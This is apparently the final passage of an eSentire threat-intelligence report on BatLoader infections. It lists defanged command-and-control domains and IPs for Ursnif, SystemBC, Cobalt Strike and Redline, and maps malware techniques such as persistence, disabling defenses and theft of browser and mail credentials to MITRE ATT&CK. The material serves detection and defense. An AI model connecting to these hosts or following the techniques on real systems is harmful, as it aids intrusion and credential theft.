| Ursnif C2 | weiqeqwns[.]com |
| Ursnif C2 | wdeiqeqwns[.]com |
| Ursnif C2 | weiqeqwens[.]com |
| Ursnif C2 | weiqewqwns[.]com |
| Ursnif C2 | iujdhsndjfks[.]com |
| Ursnif C2 | trackingg-protectioon.cdn1.mozilla[.]net |
| Ursnif C2 | 45.8.158[.]104 |
| Ursnif C2 | 188.127.224[.]114 |
| Ursnif C2 | siwdmfkshsgw[.]com |
| Vidar Stealer | t[.]me/trampapanam |
| Ursnif C2 | Ijduwhsbvk[.]com |
| Vidar Stealer | nerdculture[.]de/@yoxhyp |
| SystemBC C2 | hgfiudtyukjnio[.]com |
| SystemBC C2 (overlaps with Ursnif C2 ISP) | 188.127.224[.]46 |
| Cobalt Strike C2 | 139.60.161[.]74 |
| Redline C2 | 176.113.115[.]10 |
| MITRE ATT&CK Tactic | ID | MITRE ATT&CK Technique | Description |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | BatLoader is delivered via fake software installers |
| User Execution | T1204.002 | Malicious File | The user launches the malicious MSI file |
| Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | As a result of BatLoader infection, ISFB malware creates the persistence via Registry Run Keys. Syncro RMM can also be used as a persistence mechanism |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Disabling Windows Defender notifications, Task Manager and Command Prompt |
| Process Injection | T1055 | Process Injection | ISFB injects itself into explorer.exe as a result of successful BatLoader infection |
| Unsecured Credentials | T1552.001 | Unsecured Credentials: Credentials In Files | The ISFB version observed is capable of accessing browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP passwords. |
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.